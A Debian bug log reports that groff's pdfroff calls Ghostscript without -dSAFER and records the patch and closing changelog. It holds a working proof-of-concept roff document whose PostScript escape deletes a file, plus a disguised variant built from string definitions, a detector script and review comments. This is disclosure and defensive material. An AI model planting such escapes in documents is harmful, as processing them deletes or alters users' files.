Debian Bug report logs - #538338
groff: pdfroff invokes gs insecurely (without -dSAFER)


Package: groff; Maintainer for groff is Colin Watson <cjwatson@debian.org>; Source for groff is src:groff.

Reported by: "brian m. carlson" <sandals@crustytoothpaste.ath.cx>

Date: Fri, 24 Jul 2009 22:21:01 UTC

Severity: grave

Tags: security

Found in version groff/1.20.1-4

Fixed in version groff/1.20.1-5

Done: Colin Watson <cjwatson@debian.org>

Bug is archived. No further changes may be made.

Forwarded to bug-groff@gnu.org



Report forwarded to debian-bugs-dist@lists.debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Colin Watson <cjwatson@debian.org>:
Bug#538338; Package groff. (Fri, 24 Jul 2009 22:21:04 GMT)

Acknowledgement sent to "brian m. carlson" <sandals@crustytoothpaste.ath.cx>:
New Bug report received and forwarded. Copy sent to team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Colin Watson <cjwatson@debian.org>. (Fri, 24 Jul 2009 22:21:04 GMT)

Message #5 received at submit@bugs.debian.org:

From: "brian m. carlson" <sandals@crustytoothpaste.ath.cx>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: groff: pdfroff invokes gs insecurely (without -dSAFER)
Date: Fri, 24 Jul 2009 22:17:15 +0000
[Message part 1 (text/plain, inline)]
Package: groff
Version: 1.20.1-4
Severity: grave
File: /usr/bin/pdfroff
Tags: security

pdfroff invokes gs without -dSAFER, leading to the ability to write,
rename, and delete arbitrary files:

  lakeview ok % cat attack.roff
  I am an evil attacking document.  Boo!
  \X'ps: exec (/tmp/remove-me) deletefile'
  lakeview ok % touch /tmp/remove-me && pdfroff attack.roff >/dev/null && [ ! -f "/tmp/remove-me" ] && echo removed
  GPL Ghostscript SVN PRE-RELEASE 8.64: Unrecoverable error, exit code 1
  removed

Using ps2pdf may be a better solution, since it uses -dSAFER
automatically.

Obviously, this is a fairly straightforward example, but in a document
the size of groff's -me manual, this could easily be hidden.  Disguising
it is easy, such as in:

  lakeview ok % cat attack.roff
  I am an evil attacking document.  Boo!
  .ds df deletefile
  .ds fn /tmp/remove-me
  \X'ps: exec (\*(fn) \*(df'

Processing or viewing a document from an unknown source shouldn't by
default cause code from that document to be executed, in general.

-- System Information:
Debian Release: squeeze/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/zsh4

Versions of packages groff depends on:
ii  groff-base                    1.20.1-4   GNU troff text-formatting system (
ii  libc6                         2.9-21     GNU C Library: Shared libraries
ii  libgcc1                       1:4.4.1-1  GCC support library
ii  libice6                       2:1.0.5-1  X11 Inter-Client Exchange library
ii  libsm6                        2:1.1.0-2  X11 Session Management library
ii  libstdc++6                    4.4.1-1    The GNU Standard C++ Library v3
ii  libx11-6                      2:1.2.2-1  X11 client-side library
ii  libxaw7                       2:1.0.5-2  X11 Athena Widget library
ii  libxmu6                       2:1.0.4-1  X11 miscellaneous utility library
ii  libxt6                        1:1.0.5-3  X11 toolkit intrinsics library

Versions of packages groff recommends:
ii  ghostscript                8.64~dfsg-13  The GPL Ghostscript PostScript/PDF
ii  imagemagick                7:6.5.1.0-1.1 image manipulation programs
ii  libpaper1                  1.1.23+nmu1   library for handling paper charact
ii  netpbm                     2:10.0-12     Graphics conversion tools
ii  psutils                    1.17-26       A collection of PostScript documen

groff suggests no packages.

-- no debconf information

-- 
brian m. carlson / brian with sandals: Houston, Texas, US
+1 713 440 7475 | http://crustytoothpaste.ath.cx/~bmc | My opinion only
OpenPGP: RSA v4 4096b 88AC E9B2 9196 305B A994 7552 F1BA 225C 0223 B187
[signature.asc (application/pgp-signature, inline)]
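The two documents above carry the same PostScript passthrough, once written literally and once assembled from `.ds` string definitions so that a grep for `deletefile` next to `\X'ps:` would miss it. As an added illustration (not part of the report and not groff's own code), the following Python script scans roff source for `\X'ps: ...'` escapes, expands the `.ds` strings seen so far, and reports the passthrough together with any PostScript file operators it contains, so the disguised form is flagged with the same content as the direct one. The three sample documents are constructed inline, modelled on the report's; the operator list and the helper names are this example's own choices.

```python
"""Flag raw PostScript passthrough in roff source before it reaches pdfroff/gs.

Added example: resolves troff string definitions (.ds) so that a passthrough
assembled from \*(xx references is reported with its effective content.
"""
import re

# Constructed sample documents, modelled on the two in the bug report.
DIRECT = r"""I am an evil attacking document.  Boo!
\X'ps: exec (/tmp/remove-me) deletefile'
"""

DISGUISED = r"""I am an evil attacking document.  Boo!
.ds df deletefile
.ds fn /tmp/remove-me
\X'ps: exec (\*(fn) \*(df'
"""

# Constructed benign input: string definitions and escapes, no passthrough.
BENIGN = r""".TH EXAMPLE 1
.SH NAME
example \- nothing to see here
.ds Tm \(tm
Product\*(Tm text.
"""

# PostScript operators that touch the file system. The report demonstrates
# delete; write and rename are the other two capabilities it names.
FILE_OPERATORS = ("deletefile", "renamefile", "file")

DS_RE = re.compile(r'^\.ds\s+(\S+)\s*(.*)$')          # .ds name value
X_ESCAPE_RE = re.compile(r"\\X'([^']*)'")             # \X'...' device control
# \*x, \*(xx and \*[name] string interpolations.
STRING_REF_RE = re.compile(r'\\\*(?:\[([^\]]+)\]|\(([^\s\\]{2})|([^\s\\(\[]))')


def expand_strings(text, strings, max_rounds=10):
    """Resolve \\*(xx references against the .ds definitions seen so far.

    Repeats because a string value may itself reference other strings;
    unknown names expand to the empty string, as troff does. The round cap
    keeps a self-referential definition from looping forever.
    """
    for _ in range(max_rounds):
        def sub(m):
            name = m.group(1) or m.group(2) or m.group(3)
            return strings.get(name, "")
        new = STRING_REF_RE.sub(sub, text)
        if new == text:
            break
        text = new
    return text


def scan_roff(source):
    """Return findings as (line_no, expanded_passthrough_body, file_operators)."""
    strings = {}
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        m = DS_RE.match(line)
        if m:
            value = m.group(2)
            if value.startswith('"'):        # .ds name "value: leading quote dropped
                value = value[1:]
            strings[m.group(1)] = value
            continue
        for xm in X_ESCAPE_RE.finditer(line):
            body = expand_strings(xm.group(1), strings)
            if body.lstrip().startswith("ps:"):
                ops = [op for op in FILE_OPERATORS
                       if re.search(r'\b%s\b' % op, body)]
                findings.append((lineno, body, ops))
    return findings


def is_suspicious(source):
    """True when the document contains any PostScript passthrough at all."""
    return bool(scan_roff(source))


if __name__ == "__main__":
    for name, doc in (("direct", DIRECT), ("disguised", DISGUISED), ("benign", BENIGN)):
        for lineno, body, ops in scan_roff(doc):
            print(f"{name}:{lineno}: PostScript passthrough {body!r} file operators={ops}")
        if not is_suspicious(doc):
            print(f"{name}: no passthrough found")
```

The check is deliberately narrow: it covers the `\X'ps: ...'` escape the report uses, after string expansion. Scanning input is a useful pre-filter for a document pipeline, but the reliable mitigation is on the interpreter side, where `-dSAFER` denies the file operators regardless of how the PostScript was assembled, which is what the fix later in this log applies.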

Reply sent to Colin Watson <cjwatson@debian.org>:
You have marked Bug as forwarded. (Sat, 25 Jul 2009 08:36:05 GMT)

Message #8 received at 538338-forwarded@bugs.debian.org:

From: Colin Watson <cjwatson@debian.org>
To: bug-groff@gnu.org
Cc: "brian m. carlson" <sandals@crustytoothpaste.ath.cx>, 538338-forwarded@bugs.debian.org
Subject: [sandals@crustytoothpaste.ath.cx: Bug#538338: groff: pdfroff invokes gs insecurely (without -dSAFER)]
Date: Sat, 25 Jul 2009 09:32:38 +0100
[Message part 1 (text/plain, inline)]
groff uses -dSAFER elsewhere (pre-html.cpp); is there any reason not to
do so here?

Thanks,

-- 
Colin Watson                                       [cjwatson@debian.org]
[Message part 2 (message/rfc822, inline): forwarded copy of Message #5 above]

Added tag(s) patch. Request was from Nico Golde <nion@debian.org> to control@bugs.debian.org. (Sun, 09 Aug 2009 14:18:03 GMT)

Removed tag(s) patch. Request was from Nico Golde <nion@debian.org> to control@bugs.debian.org. (Sun, 09 Aug 2009 14:18:05 GMT)

Message #13 received at 538338-forwarded@bugs.debian.org:

From: Colin Watson <cjwatson@debian.org>
To: bug-groff@gnu.org, "brian m. carlson" <sandals@crustytoothpaste.ath.cx>, 538338-forwarded@bugs.debian.org
Subject: Re: [sandals@crustytoothpaste.ath.cx: Bug#538338: groff: pdfroff invokes gs insecurely (without -dSAFER)]
Date: Sat, 15 Aug 2009 08:59:08 +0100
On Sat, Jul 25, 2009 at 09:32:38AM +0100, Colin Watson wrote:
> groff uses -dSAFER elsewhere (pre-html.cpp); is there any reason not to
> do so here?

I'm applying this patch to the Debian package. Please consider it?

=== modified file 'contrib/pdfmark/pdfroff.sh'
--- contrib/pdfmark/pdfroff.sh	2009-08-15 07:55:23 +0000
+++ contrib/pdfmark/pdfroff.sh	2009-08-15 07:57:43 +0000
@@ -600,7 +600,7 @@
   $SAY >&2 $n "Writing PDF output ..$c"
   if test -z "$PDFROFF_POSTPROCESSOR_COMMAND"
   then
-    PDFROFF_POSTPROCESSOR_COMMAND="$GS -dQUIET -dBATCH -dNOPAUSE
+    PDFROFF_POSTPROCESSOR_COMMAND="$GS -dQUIET -dBATCH -dNOPAUSE -dSAFER
       -sDEVICE=pdfwrite -sOutputFile="${PDF_OUTPUT-"-"}
 
   elif test -n "$PDF_OUTPUT"
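Review bot: -dSAFER is added only inside the `test -z "$PDFROFF_POSTPROCESSOR_COMMAND"` branch, i.e. to the built-in default command, so a user or site that sets PDFROFF_POSTPROCESSOR_COMMAND gets exactly what they configured, without the restriction. That is a reasonable contract, but it should be stated where that variable is documented, so an override does not silently bring back the file-deletion behaviour from the report. The `elif test -n "$PDF_OUTPUT"` branch that follows is outside the hunk; if it builds a `$GS` command line of its own, it needs the same flag.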

Thanks,

-- 
Colin Watson                                       [cjwatson@debian.org]

Message #14 received at 538338-forwarded@bugs.debian.org:

From: Colin Watson <cjwatson@debian.org>
To: bug-groff@gnu.org, "brian m. carlson" <sandals@crustytoothpaste.ath.cx>, 538338-forwarded@bugs.debian.org
Subject: Re: [sandals@crustytoothpaste.ath.cx: Bug#538338: groff: pdfroff invokes gs insecurely (without -dSAFER)]
Date: Sat, 15 Aug 2009 09:01:28 +0100
On Sat, Aug 15, 2009 at 08:59:08AM +0100, Colin Watson wrote:
> On Sat, Jul 25, 2009 at 09:32:38AM +0100, Colin Watson wrote:
> > groff uses -dSAFER elsewhere (pre-html.cpp); is there any reason not to
> > do so here?
> 
> I'm applying this patch to the Debian package. Please consider it?

Or, in fact, this patch, which adjusts the documentation too.

=== modified file 'contrib/pdfmark/pdfroff.man'
--- contrib/pdfmark/pdfroff.man	2009-08-15 07:55:23 +0000
+++ contrib/pdfmark/pdfroff.man	2009-08-15 08:00:24 +0000
@@ -521,7 +521,7 @@ defaults to
 .IP
 .I
 .ad l
-.NH gs \-dBATCH \-dQUIET \-dNOPAUSE \-sDEVICE=pdfwrite \-sOutputFile=\-
+.NH gs \-dBATCH \-dQUIET \-dNOPAUSE \-dSAFER \-sDEVICE=pdfwrite \-sOutputFile=\-
 .ad
 .RE
 .
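Review bot: the documented default now carries \-dSAFER, matching the script change, but the flag order differs between the two (`gs \-dBATCH \-dQUIET \-dNOPAUSE \-dSAFER` here versus `-dQUIET -dBATCH -dNOPAUSE -dSAFER` in pdfroff.sh). Functionally harmless, but aligning them saves readers who compare the two from wondering whether they are the same command. A sentence saying why the flag is present (PostScript embedded in the input must not be able to reach the file system) would also keep a later editor from dropping it as noise.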

=== modified file 'contrib/pdfmark/pdfroff.sh'
--- contrib/pdfmark/pdfroff.sh	2009-08-15 07:55:23 +0000
+++ contrib/pdfmark/pdfroff.sh	2009-08-15 07:57:43 +0000
@@ -600,7 +600,7 @@
   $SAY >&2 $n "Writing PDF output ..$c"
   if test -z "$PDFROFF_POSTPROCESSOR_COMMAND"
   then
-    PDFROFF_POSTPROCESSOR_COMMAND="$GS -dQUIET -dBATCH -dNOPAUSE
+    PDFROFF_POSTPROCESSOR_COMMAND="$GS -dQUIET -dBATCH -dNOPAUSE -dSAFER
       -sDEVICE=pdfwrite -sOutputFile="${PDF_OUTPUT-"-"}
 
   elif test -n "$PDF_OUTPUT"
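Review bot: this is the same pdfroff.sh hunk as in the earlier patch and inherits the same caveat: the protection applies only when PDFROFF_POSTPROCESSOR_COMMAND is unset. Since the reporter supplied a minimal reproducer (a `\X'ps: exec ... deletefile'` escape against a file in /tmp), it is worth turning into a regression check in the package: run pdfroff over that document and assert that the target file still exists afterwards. That also confirms the flag survives the quoted multi-line assignment and actually reaches gs.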

Thanks,

-- 
Colin Watson                                       [cjwatson@debian.org]

Reply sent to Colin Watson <cjwatson@debian.org>:
You have taken responsibility. (Sat, 15 Aug 2009 10:30:09 GMT)

Notification sent to "brian m. carlson" <sandals@crustytoothpaste.ath.cx>:
Bug acknowledged by developer. (Sat, 15 Aug 2009 10:30:10 GMT)

Message #19 received at 538338-close@bugs.debian.org:

From: Colin Watson <cjwatson@debian.org>
To: 538338-close@bugs.debian.org
Subject: Bug#538338: fixed in groff 1.20.1-5
Date: Sat, 15 Aug 2009 10:04:46 +0000
Source: groff
Source-Version: 1.20.1-5

We believe that the bug you reported is fixed in the latest version of
groff, which is due to be installed in the Debian FTP archive:

groff-base_1.20.1-5_i386.deb
  to pool/main/g/groff/groff-base_1.20.1-5_i386.deb
groff_1.20.1-5.diff.gz
  to pool/main/g/groff/groff_1.20.1-5.diff.gz
groff_1.20.1-5.dsc
  to pool/main/g/groff/groff_1.20.1-5.dsc
groff_1.20.1-5_i386.deb
  to pool/main/g/groff/groff_1.20.1-5_i386.deb

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 538338@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Colin Watson <cjwatson@debian.org> (supplier of updated groff package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Sat, 15 Aug 2009 09:01:47 +0100
Source: groff
Binary: groff-base groff
Architecture: source i386
Version: 1.20.1-5
Distribution: unstable
Urgency: low
Maintainer: Colin Watson <cjwatson@debian.org>
Changed-By: Colin Watson <cjwatson@debian.org>
Description: 
 groff      - GNU troff text-formatting system
 groff-base - GNU troff text-formatting system (base system components)
Closes: 538330 538338 541019 541621
Changes: 
 groff (1.20.1-5) unstable; urgency=low
 .
   * Upgrade to debhelper v7. (There's still lots of complexity here, so no
     dh(1).)
   * Remove Fumitoshi UKAI from Uploaders, with thanks for his previous work.
     Just shout if you want to be added back (closes: #541019).
   * Unset IFS at nroff startup (closes: #541621).
   * Patch from Openwall to fix temporary file handling vulnerabilities in
     pdfroff (closes: #538330).
   * Use -dSAFER when calling gs from pdfroff (thanks, brian m. carlson;
     closes: #538338).
Checksums-Sha1: 
 07d34cdf3f9a41ac8f80e7b38861afd2a4332bc1 1258 groff_1.20.1-5.dsc
 afc572adbb7f9c762c50048ad3eec5cd1952f3ef 41184 groff_1.20.1-5.diff.gz
 89ee0590a202dca5c08415edafad39d7224a4375 1103698 groff-base_1.20.1-5_i386.deb
 d0a0c97b9156d9be0ae0d19af004ecf08cd95601 3512134 groff_1.20.1-5_i386.deb
Checksums-Sha256: 
 6d7fe33055e63798e631cbb0208f57be1affd53616cd525644263c7bd0270a9d 1258 groff_1.20.1-5.dsc
 ab37002d146cb29d907ad8097c2620e1e63c699aaed1f394bd032b7ab8625fa6 41184 groff_1.20.1-5.diff.gz
 01003d22439094286fdcf1c5ef036ba2a825215ef816e9939a2f944aa9301c6e 1103698 groff-base_1.20.1-5_i386.deb
 0b0b8fec29f42590ef2bb1f90e36fe1db18974152abe1f68824ac40ea5c254db 3512134 groff_1.20.1-5_i386.deb
Files: 
 db341bf62664c0afefd71016c9cc3888 1258 text important groff_1.20.1-5.dsc
 3bfaace1000bf8687ec8d6c02c84b1e6 41184 text important groff_1.20.1-5.diff.gz
 a93b5459d35d5bb1c522642a18bca234 1103698 text important groff-base_1.20.1-5_i386.deb
 e4558537f026c6d0db872a5c8efa6a95 3512134 text optional groff_1.20.1-5_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Colin Watson <cjwatson@debian.org> -- Debian developer

iD8DBQFKhm6T9t0zAhD6TNERAmwQAJ4uNNVsSBiTzKXdhJ5OPU/LXbqSWwCbBbJn
XTXdB9uhIGw+9ivXuNSpnIA=
=fTmN
-----END PGP SIGNATURE-----

Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Wed, 16 Sep 2009 07:34:45 GMT)



Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Thu Apr 24 07:54:47 2014; Machine Name: beach.debian.org
